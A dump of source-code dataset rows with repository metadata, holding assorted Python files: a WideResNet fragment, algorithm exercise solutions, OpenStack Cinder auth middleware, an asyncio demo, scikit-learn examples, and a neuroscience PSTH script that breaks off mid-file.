self.group1 = self._make_block(widths[1], n, downsample=True)
self.group2 = self._make_block(widths[2], n, downsample=True)
self.bn = nn.BatchNorm2d(widths[2], affine=False)
self.register_parameter('conv_last', init_weight(num_classes, widths[2], 1, 1))
self.bn_last = nn.BatchNorm2d(num_classes)
self.mean = [125.3 / 255.0, 123.0 / 255.0, 113.9 / 255.0]
self.std = [63.0 / 255.0, 62.1 / 255.0, 66.7 / 255.0]
def _make_block(self, width, n, downsample=False):
def select_block(j):
if downsample and j == 0:
return DownsampleBlock(width)
return Block(width)
return nn.Sequential(OrderedDict(('block%d' % i, select_block(i)) for i in range(n)))
def forward(self, x):
x = data_normalize(x, self.mean, self.std)
h = F.conv2d(x, self.conv0, padding=1)
h = self.group0(h)
h = self.group1(h)
h = self.group2(h)
h = F.relu(self.bn(h))
h = F.conv2d(h, self.conv_last)
h = self.bn_last(h)
return F.avg_pool2d(h, kernel_size=h.shape[-2:]).view(h.shape[0], -1)
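if __name__ == '__main__':
    # Minimal smoke test (sketch): assumes CIFAR-style 32x32 RGB inputs, a WRN-28-10
    # configuration, and that the project's `utils.data_normalize` is importable.
    model = WRN(depth=28, width=10, num_classes=10)
    out = model(torch.rand(2, 3, 32, 32))
    print(out.shape)  # torch.Size([2, 10])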
| [
"[email protected]"
]
| |
e34145873aede1b65f5e55265e1505cc6bde3391 | 387cf5f72ed6679a4d9e04bddd16998a190c4caf | /problems/programmers/lv3/pgs-67258-sweep-slow.py | 6a3ef6ae150570c9680bfdc5e53635a2e6635517 | []
| no_license | CodyBuilder-dev/Algorithm-Coding-Test | db4ee1e7565fbcef3140192225167eff42ad5c02 | cca5c4ba8bc31679ab00aceccfd8d9d39c232f72 | refs/heads/master | 2021-07-24T00:34:41.888289 | 2021-07-21T14:29:00 | 2021-07-21T14:29:00 | 219,123,221 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,347 | py | """
Title: Gem Shopping
Idea:
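Sweep left to right, keeping the most recent index of each gem kind in a dict;
once every kind has been seen, the candidate interval is
[min(last indices) + 1, max(last indices) + 1], and the shortest (leftmost on ties) wins.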
"""
def solution(gems):
s = set(gems)
hash = {}
    #interval_list = [] # store candidate intervals in a list
best_answer = [123456,456789]
for i,gem in enumerate(gems):
if gem not in hash:
hash[gem] = 0
hash[gem] = i
if len(hash) ==len(s):
temp_answer = [min(hash.values()) + 1, max(hash.values()) + 1]
if temp_answer[1] - temp_answer[0] < best_answer[1] - best_answer[0]:
best_answer = temp_answer
elif temp_answer[1] - temp_answer[0] == best_answer[1] - best_answer[0] \
and temp_answer[0] < best_answer[0]:
best_answer = temp_answer
return best_answer
print(solution(["DIA", "RUBY", "RUBY", "DIA", "DIA", "EMERALD", "SAPPHIRE", "DIA"]))
print(solution(["AA", "AB", "AC", "AA", "AC"]))
print(solution(["XYZ", "XYZ", "XYZ"]))
print(solution(["ZZZ", "YYY", "NNNN", "YYY", "BBB"]))
print(solution(["DIA", "EM", "EM", "RUB", "DIA"]))
print(solution(["A", "A", "B"])) #5 #10
print(solution(["AD","AA", "AB", "AC", "AA", "AC", "AD", "AB"]))
print(solution(["AD","AA", "AB", "AC", "AA", "AC", "AD", "AB", "AZ","AB","AC","AA"]))
print(solution(["AD","AA", "AB", "AC", "AA", "AC", "AC", "AD", "AB","AZ","AB","AD","AC","AA","AB","AZ","AA"]))
| [
"[email protected]"
]
| |
c64f6276a76c1f9c5a452595cbcd25de501fd7f6 | e65a448da4f82d6e7c95cfadc5e8dfd06ed05c62 | /cinder/cinder/api/middleware/auth.py | cf898c9b07d780e57e877272a930772dd33360d5 | [
"Apache-2.0"
]
| permissive | bopopescu/devstack | 7a9d11bcc37884f3686e7178ebc25c178a6da283 | 6b73b164af7e5895501f1ca5dafebbba90510846 | refs/heads/master | 2022-11-19T19:58:43.536574 | 2015-01-29T09:00:59 | 2015-01-29T09:00:59 | 282,101,378 | 0 | 0 | null | 2020-07-24T02:17:48 | 2020-07-24T02:17:47 | null | UTF-8 | Python | false | false | 6,014 | py | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Auth Middleware.
"""
import os
from oslo.config import cfg
from oslo.serialization import jsonutils
import webob.dec
import webob.exc
from cinder.api.openstack import wsgi
from cinder import context
from cinder.i18n import _
from cinder.openstack.common import log as logging
from cinder.openstack.common.middleware import request_id
from cinder import wsgi as base_wsgi
use_forwarded_for_opt = cfg.BoolOpt(
'use_forwarded_for',
default=False,
help='Treat X-Forwarded-For as the canonical remote address. '
'Only enable this if you have a sanitizing proxy.')
CONF = cfg.CONF
CONF.register_opt(use_forwarded_for_opt)
LOG = logging.getLogger(__name__)
def pipeline_factory(loader, global_conf, **local_conf):
"""A paste pipeline replica that keys off of auth_strategy."""
pipeline = local_conf[CONF.auth_strategy]
if not CONF.api_rate_limit:
limit_name = CONF.auth_strategy + '_nolimit'
pipeline = local_conf.get(limit_name, pipeline)
pipeline = pipeline.split()
filters = [loader.get_filter(n) for n in pipeline[:-1]]
app = loader.get_app(pipeline[-1])
filters.reverse()
for filter in filters:
app = filter(app)
return app
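# Illustrative api-paste.ini composite section (hedged sketch, not the actual file in
# this tree): pipeline_factory picks the pipeline whose key matches CONF.auth_strategy,
# and falls back to the '<auth_strategy>_nolimit' variant when rate limiting is off.
#
#   [composite:osapi_volume]
#   use = call:cinder.api.middleware.auth:pipeline_factory
#   noauth = faultwrap noauth apiv2
#   keystone = faultwrap authtoken keystonecontext apiv2
#   keystone_nolimit = faultwrap authtoken keystonecontext apiv2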
class InjectContext(base_wsgi.Middleware):
"""Add a 'cinder.context' to WSGI environ."""
def __init__(self, context, *args, **kwargs):
self.context = context
super(InjectContext, self).__init__(*args, **kwargs)
@webob.dec.wsgify(RequestClass=base_wsgi.Request)
def __call__(self, req):
req.environ['cinder.context'] = self.context
return self.application
class CinderKeystoneContext(base_wsgi.Middleware):
"""Make a request context from keystone headers."""
@webob.dec.wsgify(RequestClass=base_wsgi.Request)
def __call__(self, req):
user_id = req.headers.get('X_USER')
user_id = req.headers.get('X_USER_ID', user_id)
if user_id is None:
LOG.debug("Neither X_USER_ID nor X_USER found in request")
return webob.exc.HTTPUnauthorized()
# get the roles
roles = [r.strip() for r in req.headers.get('X_ROLE', '').split(',')]
if 'X_TENANT_ID' in req.headers:
# This is the new header since Keystone went to ID/Name
project_id = req.headers['X_TENANT_ID']
else:
# This is for legacy compatibility
project_id = req.headers['X_TENANT']
project_name = req.headers.get('X_TENANT_NAME')
req_id = req.environ.get(request_id.ENV_REQUEST_ID)
# Get the auth token
auth_token = req.headers.get('X_AUTH_TOKEN',
req.headers.get('X_STORAGE_TOKEN'))
# Build a context, including the auth_token...
remote_address = req.remote_addr
service_catalog = None
if req.headers.get('X_SERVICE_CATALOG') is not None:
try:
catalog_header = req.headers.get('X_SERVICE_CATALOG')
service_catalog = jsonutils.loads(catalog_header)
except ValueError:
raise webob.exc.HTTPInternalServerError(
explanation=_('Invalid service catalog json.'))
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctx = context.RequestContext(user_id,
project_id,
project_name=project_name,
roles=roles,
auth_token=auth_token,
remote_address=remote_address,
service_catalog=service_catalog,
request_id=req_id)
req.environ['cinder.context'] = ctx
return self.application
class NoAuthMiddleware(base_wsgi.Middleware):
"""Return a fake token if one isn't specified."""
@webob.dec.wsgify(RequestClass=wsgi.Request)
def __call__(self, req):
if 'X-Auth-Token' not in req.headers:
user_id = req.headers.get('X-Auth-User', 'admin')
project_id = req.headers.get('X-Auth-Project-Id', 'admin')
os_url = os.path.join(req.url, project_id)
res = webob.Response()
# NOTE(vish): This is expecting and returning Auth(1.1), whereas
# keystone uses 2.0 auth. We should probably allow
# 2.0 auth here as well.
res.headers['X-Auth-Token'] = '%s:%s' % (user_id, project_id)
res.headers['X-Server-Management-Url'] = os_url
res.content_type = 'text/plain'
res.status = '204'
return res
token = req.headers['X-Auth-Token']
user_id, _sep, project_id = token.partition(':')
project_id = project_id or user_id
remote_address = getattr(req, 'remote_address', '127.0.0.1')
if CONF.use_forwarded_for:
remote_address = req.headers.get('X-Forwarded-For', remote_address)
ctx = context.RequestContext(user_id,
project_id,
is_admin=True,
remote_address=remote_address)
req.environ['cinder.context'] = ctx
return self.application
| [
"[email protected]"
]
| |
f6e400373186312a9fcf3e60bc466491e7ced87f | 780b6cca690a213ac908b1cd5faef5366a18dc4e | /276_newbie_bite/save1_passed.py | 7568b69b77be52f1d12ae46c2c3d5cec4cd7fba1 | []
| no_license | katkaypettitt/pybites-all | 899180a588e460b343c00529c6a742527e4ea1bc | 391c07ecac0d92d5dc7c537bcf92eb6c1fdda896 | refs/heads/main | 2023-08-22T16:33:11.171732 | 2021-10-24T17:29:44 | 2021-10-24T17:29:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | # Hint: Don't forget the 4 leading spaces to
# indicate your code is within the function.
a = 10
b = 5
def multiply_numbers(a, b):
return a * b
def enter_name():
username = input("What is your name?")
return username | [
"[email protected]"
]
| |
9de698aabcd24e0d8e7b125ea53adbb5167b3d8b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02394/s366374910.py | 34d6b2cc6782e5002623f9419f9f8a358a2dd94e | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | w, h, x, y, r = map(int, input().split())
if 0 <= (x-r) and (x+r) <= w and 0 <= (y-r) and (y+r) <= h:
print("Yes")
else:
print("No")
| [
"[email protected]"
]
| |
e2f80ae63c842ab915e70054164ea7ef16f417b2 | 15fb62305a2fa0146cc84b289642cc01a8407aab | /Python/119-pascalTriangle2.py | ca82b9b5ce299755fd88d42d79285542b566e463 | []
| no_license | geniousisme/leetCode | ec9bc91864cbe7520b085bdab0db67539d3627bd | 6e12d67e4ab2d197d588b65c1ddb1f9c52a7e047 | refs/heads/master | 2016-09-09T23:34:03.522079 | 2015-09-23T16:15:05 | 2015-09-23T16:15:05 | 32,052,408 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from math import factorial
class Solution:
# @param {integer} rowIndex
# @return {integer[]}
def getRow(self, rowIndex):
res = []
f = factorial
n = rowIndex
for k in xrange(rowIndex + 1):
res.append(f(n) / f(k) / f(n - k))
return res
if __name__ == '__main__':
s = Solution()
for i in xrange(10):
print s.getRow(i)
| [
"[email protected]"
]
| |
790f7806b7f537150ccb4a127bd799627afad0e4 | 1f8344813458f669bdf77059220290a3b2a3cdd0 | /tutorials-docs/thinking-in-coroutines/8_run_in_default_executor.py | 81a53d28f3690104d9512aac1b837e073a2f0b81 | []
| no_license | gridl/asyncio-study-group | 7c03e8640070ebe8d1103f27bc3c3da37a5a661f | 1ba9cf90e21b5174518032d467e89526da219576 | refs/heads/master | 2020-07-02T07:03:12.364097 | 2017-12-26T20:55:09 | 2017-12-26T20:55:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | import time
import datetime
import asyncio
def blocking_call(seconds):
print(seconds, datetime.datetime.now())
time.sleep(seconds)
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.call_later(5, loop.stop)
for i in range(1,4):
        # by default concurrent.futures.ThreadPoolExecutor is used;
        # to get it, pass executor = None
        # the default number of worker threads is:
#number of processors on the machine, multiplied by 5
loop.run_in_executor(None, blocking_call, i)
try:
loop.run_forever()
finally:
loop.close()
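# Variation (sketch, not part of the original): instead of executor=None an explicit
# pool with the same call signature can be passed, e.g.
#     from concurrent.futures import ThreadPoolExecutor
#     pool = ThreadPoolExecutor(max_workers=3)
#     loop.run_in_executor(pool, blocking_call, 1)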
| [
"[email protected]"
]
| |
8ba3ca416a5d385c1158274f46e71ad3750148eb | e7af30370e277b459e1c49edcc0562d5b5c32abc | /Learning_ScikitLearn/Model/Linear_Classification/LogisticRegression_Classification.py | 68bb53cef0d25d1f7959af186211991c7beda251 | []
| no_license | justgolikeme/My_MachineLearning | 208ab766478662cf36ffa7f9202fed0ad6f0ad28 | 948a84684a2a6f1c9e613948ed246062468016bd | refs/heads/master | 2022-05-13T05:02:48.488269 | 2020-01-03T07:27:50 | 2020-01-03T07:27:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | # -*- coding: utf-8 -*-
# @Time : 2019/12/16 15:55
# @Author : Mr.Lin
'''
Linear models for classification
Linear models are also widely used for classification. Let's first look at binary
classification, where a prediction is made with the following formula:
ŷ = w[0] * x[0] + w[1] * x[1] + …+ w[p] * x[p] + b > 0
This formula looks very similar to the one for linear regression, but instead of
returning the weighted sum of the features, we threshold the result at zero. If the
value is smaller than 0, we predict class -1; if it is larger than 0, we predict
class +1. This prediction rule is shared by all linear models for classification.
Again, there are many different ways to find the coefficients (w) and the
intercept (b).
For linear models for regression, the output ŷ is a linear function of the
features: a line, a plane, or a hyperplane (for higher-dimensional datasets). For
linear models for classification, the decision boundary is a linear function of
the input. In other words, a (binary) linear classifier separates two classes with
a line, a plane, or a hyperplane. We will see examples of that in this section.
There are many algorithms for learning linear models. They differ in two ways:
• how they measure how well a particular combination of coefficients and intercept
  fits the training data;
• whether, and what kind of, regularization is used.
Different algorithms measure "fitting the training set well" differently. For
technical mathematical reasons it is not possible to tune w and b to minimize the
number of misclassifications, and for our purposes (and for many applications) the
choice of this first point, known as the loss function, is not very important.
The two most common linear classification algorithms are logistic regression and
the linear support vector machine (linear SVM); the former is implemented in
linear_model.LogisticRegression, the latter in svm.LinearSVC (SVC stands for
support vector classifier). Although LogisticRegression has "regression" in its
name, it is a classification algorithm, not a regression algorithm, and should not
be confused with LinearRegression.
'''
from sklearn.model_selection import cross_val_predict, cross_val_score  # sklearn.cross_validation was removed in scikit-learn 0.20
from sklearn.linear_model import LogisticRegression
from Learning_ScikitLearn.Model.Linear_Classification.Data_Source import X_test,X_train,y_train,y_test,data_y,data_X
# logreg = LogisticRegression().fit(X_train, y_train)
# print("Training set score: {:.3f}".format(logreg.score(X_train, y_train)))
# print("Test set score: {:.3f}".format(logreg.score(X_test, y_test)))
# Training set score: 0.955
# Test set score: 0.958
#
# [0.94827586 0.9137931 0.92982456 0.94736842 0.96491228 0.98245614
# 0.94736842 0.94642857 0.96428571 0.96428571]
# print("")
# print(cross_val_score(logreg, data_X, data_y, cv=10))
def test_C_Parameter():
C = [0.1,1,10]
for c in C:
logreg = LogisticRegression(C=c)
logreg.fit(X_train,y_train)
print("C为:{}下的分数:{}\n".format(c,cross_val_score(logreg, data_X, data_y, cv=10)))
test_C_Parameter()
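# Sketch (not part of the original script): the other common linear classifier named
# in the docstring, LinearSVC, can be compared the same way:
# from sklearn.svm import LinearSVC
# svc = LinearSVC(C=1.0).fit(X_train, y_train)
# print(cross_val_score(svc, data_X, data_y, cv=10))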
| [
"[email protected]"
]
| |
7ad47d35b8b6d618120876ea81cee10cd4498f0f | 329b48089c64ebefe78d52f1c71c73bdadadd4b4 | /ML/m02_3_xor.py | f054586220c6b7e9e2f5ec6da088dfde56b25a5d | []
| no_license | variablejun/keras__R | 7f854570952ed97c48715047015786d873e512cb | 9faf4814b46cda1ac0ddbf2a2f8236fa0394f144 | refs/heads/main | 2023-07-13T19:32:25.950500 | 2021-08-22T18:26:52 | 2021-08-22T18:26:52 | 398,870,548 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | from sklearn.svm import LinearSVC
import numpy as np
from sklearn.metrics import accuracy_score
#1 data
x_data = [[0,0],[0,1],[1,0],[1,1]]
y_data = [0,1,1,0]
#2 model
model = LinearSVC()
#3 fit
model.fit(x_data,y_data)
#4 evaluate
y_predict = model.predict(x_data)
print(x_data,' 의 예측값 : ',y_predict)
results= model.score(x_data, y_data)
print('score : ',results)
acc = accuracy_score(y_data,y_predict)
print('acc : ',acc)
'''
[[0, 0], [0, 1], [1, 0], [1, 1]] 의 예측값 : [0 0 0 0]
score : 0.5
acc : 0.5
[[0, 0], [0, 1], [1, 0], [1, 1]] 의 예측값 : [1 1 1 1]
score : 0.5
acc : 0.5
''' | [
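# Follow-up sketch (not part of this file): a kernel SVM, unlike the linear model above,
# can represent XOR:
# from sklearn.svm import SVC
# model = SVC()                 # default RBF kernel
# model.fit(x_data, y_data)
# model.predict(x_data)         # typically [0 1 1 0] on these four points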
"[email protected]"
]
| |
9d79f133ae46df0a2a814949bc56bb9b67709332 | 92754bb891a128687f3fbc48a312aded752b6bcd | /Algorithms/Python3.x/836-Rectangle_Overlap.py | 109710852b3db1879f46f641e56714e64efbeca6 | []
| no_license | daidai21/Leetcode | ddecaf0ffbc66604a464c3c9751f35f3abe5e7e5 | eb726b3411ed11e2bd00fee02dc41b77f35f2632 | refs/heads/master | 2023-03-24T21:13:31.128127 | 2023-03-08T16:11:43 | 2023-03-08T16:11:43 | 167,968,602 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 611 | py | # Runtime: 32 ms, faster than 89.53% of Python3 online submissions for Rectangle Overlap.
# Memory Usage: 13.9 MB, less than 8.33% of Python3 online submissions for Rectangle Overlap.
class Solution:
def isRectangleOverlap(self, rec1: List[int], rec2: List[int]) -> bool:
return rec1[0] < rec2[2] and rec2[0] < rec1[2] and rec1[1] < rec2[3] and rec2[1] < rec1[3]
"""
    For a single axis with intervals (left1, right1) and (left2, right2),
    "the rectangles overlap on this axis" means some x lies in both intervals:
    left1 < x < right1 && left2 < x < right2
    <=> left1 < x < right2 && left2 < x < right1  (for some x)
    <=> left1 < right2 && left2 < right1
    Applying this to both the x-axis and the y-axis gives the expression above.
"""
| [
"[email protected]"
]
| |
bfb211f64cb26ced576000456975b8ac4e62ba43 | dab869acd10a3dc76e2a924e24b6a4dffe0a875f | /Laban/build/bdist.win32/winexe/temp/numpy.core.operand_flag_tests.py | abe53bfc427cda30a4fdef6d870c6ffe58b6c013 | []
| no_license | ranBernstein/Laban | d82aff9b0483dd007e03a06e51f7d635f62ed05d | 54c88afa9493deacbdd182904cc5d180ecb208b4 | refs/heads/master | 2021-01-23T13:17:51.777880 | 2017-02-14T09:02:54 | 2017-02-14T09:02:54 | 25,508,010 | 3 | 1 | null | 2017-02-14T09:02:55 | 2014-10-21T07:16:01 | Tcl | UTF-8 | Python | false | false | 379 | py |
def __load():
import imp, os, sys
try:
dirname = os.path.dirname(__loader__.archive)
except NameError:
dirname = sys.prefix
path = os.path.join(dirname, 'numpy.core.operand_flag_tests.pyd')
#print "py2exe extension module", __name__, "->", path
mod = imp.load_dynamic(__name__, path)
## mod.frozen = 1
__load()
del __load
| [
"[email protected]"
]
| |
cde96ba8bed0f8a27d9a27fc09c79f90b37b0093 | 4781d9293b59a5072647bb179195b143c60621bd | /백준/3190_뱀/3190_뱀.py | 466985fd6c7408c5d7d548c56da8c4c1f93da5da | []
| no_license | chriskwon96/Algorithm_codes | bf98131f66ca9c091fe63db68b220527800069c9 | edb7b803370e87493dad4a38ee858bb7bb3fd31d | refs/heads/master | 2023-08-15T18:48:26.809864 | 2021-10-12T13:43:21 | 2021-10-12T13:43:21 | 387,803,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,488 | py | di = [0, -1, 0, +1]
dj = [+1, 0, -1, 0]
N = int(input())
matrix = [[0]*N for _ in range(N)]
K = int(input())
for _ in range(K): # mark apple positions with 1
i, j = map(int, input().split())
matrix[i-1][j-1] = 1
L = int(input())
q = [(0,0)] # snake body, head first
X1, k, cnt = 0, 0, 0
flag = 1
for _ in range(L):
X, C = input().split()
for _ in range(int(X)-X1):
head = q[0]
cnt += 1
n_x, n_y = head[0]+di[k], head[1]+dj[k]
        if 0<=n_x<N and 0<=n_y<N and ((n_x, n_y) not in q): # next cell is on the board and not part of the body
            q.insert(0, (n_x, n_y)) # push the new head position onto q
            if matrix[n_x][n_y]: # apple here
                matrix[n_x][n_y] = 0 # remove the apple
            else:
                q.pop() # no apple: drop the tail
        else: # game over (hit a wall or the body)
print(cnt)
flag = 0
break
if not flag:
break
X1 = int(X)
if C == 'L':
k = (k+1)%4
else:
k = (k-1)%4
if flag: # the game did not end while processing the turn commands
head = q[0]
n_x, n_y = head[0]+di[k], head[1]+dj[k]
while 0<=n_x<N and 0<=n_y<N and ((n_x, n_y) not in q):
cnt += 1
q.insert(0, (n_x, n_y))
        if matrix[n_x][n_y]: # apple here
            matrix[n_x][n_y] = 0 # remove the apple
        else:
            q.pop() # no apple: drop the tail
n_x, n_y = n_x + di[k], n_y + dj[k]
print(cnt+1)
| [
"[email protected]"
]
| |
b417569a701914b13050a450dfb4e9d8d98231f5 | 59cdb8b3995ee5938dc4710e32f29ac273410265 | /firing_analyses/unit_response_characterization/gather_psths.py | a170cd2c1a9f45a1da9d668f911611f166dfb215 | []
| no_license | abuzarmahmood/firing_space_plot | 15ff667fada8f4e985a6a6c6f31261b72b0f4b60 | 9fe925d9b443fda96d8e23d6d2d2d2aa60b08f15 | refs/heads/master | 2023-07-25T01:39:31.942434 | 2023-07-15T14:24:38 | 2023-07-15T14:24:38 | 139,602,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,390 | py | """
Go through all specified files and generate PSTHs
for GC and BLA neurons to save in a consolidated location
For each neuron, also calculate discriminability and palatability correlation
"""
########################################
# ___ _
#|_ _|_ __ ___ _ __ ___ _ __| |_
# | || '_ ` _ \| '_ \ / _ \| '__| __|
# | || | | | | | |_) | (_) | | | |_
#|___|_| |_| |_| .__/ \___/|_| \__|
# |_|
########################################
import os
import sys
import pylab as plt
import numpy as np
import argparse
from glob import glob
import json
import pandas as pd
import pingouin as pg
from joblib import Parallel, delayed, cpu_count
from tqdm import tqdm,trange
from scipy.stats import spearmanr, pearsonr
sys.path.append('/media/bigdata/firing_space_plot/ephys_data')
from ephys_data import ephys_data
import visualize
def parallelize(func, iterator):
return Parallel(n_jobs = cpu_count()-2)\
(delayed(func)(this_iter) for this_iter in tqdm(iterator))
############################################################
# _ _ ____ _
#| | ___ __ _ __| | | _ \ __ _| |_ __ _
#| | / _ \ / _` |/ _` | | | | |/ _` | __/ _` |
#| |__| (_) | (_| | (_| | | |_| | (_| | || (_| |
#|_____\___/ \__,_|\__,_| |____/ \__,_|\__\__,_|
############################################################
file_list_path = '/media/bigdata/Abuzar_Data/hdf5_file_list.txt'
plot_save_dir = '/media/bigdata/Abuzar_Data/all_overlay_psths'
if not os.path.exists(plot_save_dir):
os.makedirs(plot_save_dir)
region_name_list = ['gc','bla']
region_plot_dirs = [os.path.join(plot_save_dir,this_name) \
for this_name in region_name_list]
for this_plot_dir in region_plot_dirs:
if not os.path.exists(this_plot_dir):
os.makedirs(this_plot_dir)
def get_plot_dir(region_name):
return [plot_dir for name,plot_dir \
in zip(region_name_list,region_plot_dirs)\
if region_name == name ][0]
counter_list = [0,0]
def add_to_counter(region_name):
ind = [num for num,this_name \
in enumerate(region_name_list)\
if region_name == this_name][0]
current_count = counter_list[ind]
counter_list[ind] +=1
return current_count
#parser = argparse.ArgumentParser(description = 'Script to fit changepoint model')
#parser.add_argument('dir_name', help = 'Directory containing data files')
#parser.add_argument('states', type = int, help = 'Number of States to fit')
#args = parser.parse_args()
#data_dir = args.dir_name
taste_names = ['nacl', 'suc', 'ca', 'qhcl']
pal_map = dict(zip(taste_names, [3,4,2,1]))
with open(file_list_path,'r') as this_file:
file_list = this_file.read().splitlines()
dir_list = [os.path.dirname(x) for x in file_list]
#dir_list = [x for x in dir_list if 'bla_gc'in x]
wanted_sessions = ['AM34_4Tastes_201215', 'AM37_4Tastes_210112']
dir_list = [[x for x in dir_list if y in x] for y in wanted_sessions]
dir_list = [x for y in dir_list for x in y]
#For each file, calculate baks firing, split by region
# and save PSTH in a folder with file name and
# unit details
alpha = 0.05
#black_list = [
# '/media/storage/gc_only/AS18/AS18_4Tastes_200228_151511_copy/AS18_4Tastes_200228_151511'
# ]
#dir_list = [x for x in dir_list if x not in black_list]
#dir_list = [x for x in dir_list if 'AM34' in x]
#for data_dir in dir_list:
for ind in trange(len(dir_list)):
#for ind in trange(53, len(dir_list)):
data_dir = dir_list[ind]
#data_dir = os.path.dirname(file_list[0])
#data_dir = '/media/bigdata/Abuzar_Data/AM28/AM28_2Tastes_201005_134840'
data_basename = os.path.basename(data_dir)
# Look for info file
# If absent, skip this file because we won't know tastant names
info_file_path = glob(os.path.join(data_dir,"*.info"))
if len(info_file_path) == 0:
continue
with open(info_file_path[0], 'r') as params_file:
info_dict = json.load(params_file)
taste_names = info_dict['taste_params']['tastes']
taste_pals = np.array([pal_map[x] for x in taste_names])
dat = ephys_data(data_dir)
# Try to get spikes, if can't, skip file
try:
dat.get_spikes()
except:
continue
if not dat.spikes[0].shape[-1]==7000:
continue
dat.firing_rate_params = dat.default_firing_params
dat.firing_rate_params['type'] = 'conv'
dat.get_unit_descriptors()
dat.get_region_units()
dat.get_firing_rates()
unit_region_map = [{x:region_name for x in this_region} \
for this_region,region_name \
in zip(dat.region_units, dat.region_names)]
fin_unit_map = {}
for x in unit_region_map:
fin_unit_map.update(x)
# For each neuron, calculate disciriminability per bin
inds = np.array(list(np.ndindex(dat.firing_array.shape)))
firing_frame = pd.DataFrame(
dict(
taste = inds[:,0],
neurons = inds[:,1],
trials = inds[:,2],
bins = inds[:,3],
firing = dat.firing_array.flatten()
)
)
group_keys = ['neurons','bins']
grouped_frame = list(firing_frame.groupby(group_keys))
group_tuples = [x[0] for x in grouped_frame]
group_tuple_dicts = [dict(zip(group_keys, x)) for x in group_tuples]
group_dat = [x[1] for x in grouped_frame]
anova_lambda = lambda x : \
pg.anova(data=x, dv = 'firing', between = 'taste')['p-unc'].values[0]
p_vals = parallelize(anova_lambda, group_dat)
# It seems like sometimes the anova conks out
# Replace any strings with int(1)
    p_vals = [x if isinstance(x, float) else 1 for x in p_vals]
discrim_frame = pd.DataFrame(group_tuple_dicts)
discrim_frame['discrim_p_vals'] = p_vals
discrim_frame['discrim_bool'] = (discrim_frame['discrim_p_vals'] < alpha )*1
# Conservative criterion, significance has to persist for 75ms otherwise toss
# This is from 3 consecutive windows of firing rate with 25ms steps
kern_len = 4
box_kern = np.ones(kern_len)/kern_len
discrim_frame['discrim_bool_cons'] = \
np.convolve(discrim_frame['discrim_bool'], box_kern, mode = 'same') == 1
discrim_frame['discrim_bool_cons'] *= 1
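    # Illustration of the boxcar criterion:
    # np.convolve([0, 1, 1, 1, 1, 0], box_kern, mode='same') -> [0.25, 0.5, 0.75, 1.0, 0.75, 0.5],
    # so a bin keeps its significance only when it sits inside a long enough run of significant bins.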
discrim_frame['p_vals_conv'] = \
np.convolve(discrim_frame['discrim_p_vals'], box_kern, mode = 'same')
# Also calculate palatability correlation for sinle neurons
taste_pal_broad = np.expand_dims(taste_pals, (1,2,3))
taste_pal_broad = np.broadcast_to(taste_pal_broad,
dat.firing_array.shape)
firing_array = dat.firing_array.copy()
#firing_array = np.moveaxis(firing_array, 1,2)
#firing_array = np.reshape(firing_array, (-1, *firing_array.shape[2:]))
#taste_pal_broad = np.moveaxis(taste_pal_broad, 1,2)
#taste_pal_broad = np.reshape(taste_pal_broad, (-1, *taste_pal_broad.shape[2:]))
#firing_array = firing_array.T
#taste_pal_broad = taste_pal_broad.T
iter_inds = list(np.ndindex((
firing_array.shape[1],
firing_array.shape[-1])))
corr_lambda = lambda inds: \
pearsonr( firing_array[:,inds[0],:,inds[1]].flatten(),
taste_pal_broad[:,inds[0],:,inds[1]].flatten()
)
corr_outs = parallelize(corr_lambda, iter_inds)
corr_pvals = [x[1] for x in corr_outs]
corr_rhos = [np.abs(x[0]) for x in corr_outs]
iter_array = np.array(iter_inds)
corr_frame = pd.DataFrame(
dict(
neurons = iter_array[:,0],
bins = iter_array[:,1],
corr_pvals = corr_pvals,
corr_rhos = corr_rhos
)
)
corr_frame['pvals_cons'] = \
np.convolve(corr_frame['corr_pvals'], box_kern, mode = 'same')
corr_frame['sig_bool'] = corr_frame['pvals_cons'] <= alpha
#corr_array = corr_frame.pivot(
# index = 'neurons',
# columns = 'bins',
# values = 'corr_pvals').to_numpy()
#fig,ax = plt.subplots()
#ax.imshow(corr_array < alpha,
# interpolation = 'nearest', aspect='auto')
#fig.savefig(
# os.path.join(plot_save_dir, f'{data_basename}_corr.png'),
# dpi = 300)
#plt.close(fig)
############################################################
#fin_pval_frame = discrim_frame.join(corr_frame,
# lsuffix = 'x', rsuffix = 'y')
#fin_pval_frame.drop(columns = ['binsy','neuronsy'], inplace=True)
#fin_pval_frame.rename(columns = dict(neuronsx = 'neurons',
# binsx = 'bins'), inplace=True)
#fin_pval_frame['region'] = [fin_unit_map[x] for x in \
# fin_pval_frame.neurons.values]
#fin_pval_frame.to_json(
# os.path.join(plot_save_dir, f'{data_basename}_unit_pvals.json')
# )
#fin_pval_frame['time'] = (fin_pval_frame.bins * bin_width)-stim_t
############################################################
############################################################
stim_t = 2000
time_lims = [1000,5000]
time_vec = np.arange(dat.spikes[0].shape[-1])-stim_t
time_vec = time_vec[time_lims[0]:time_lims[1]]
if dat.firing_rate_params['type'] == 'baks':
bin_width = int(dat.firing_rate_params['baks_resolution']/\
dat.firing_rate_params['baks_dt'] )
else:
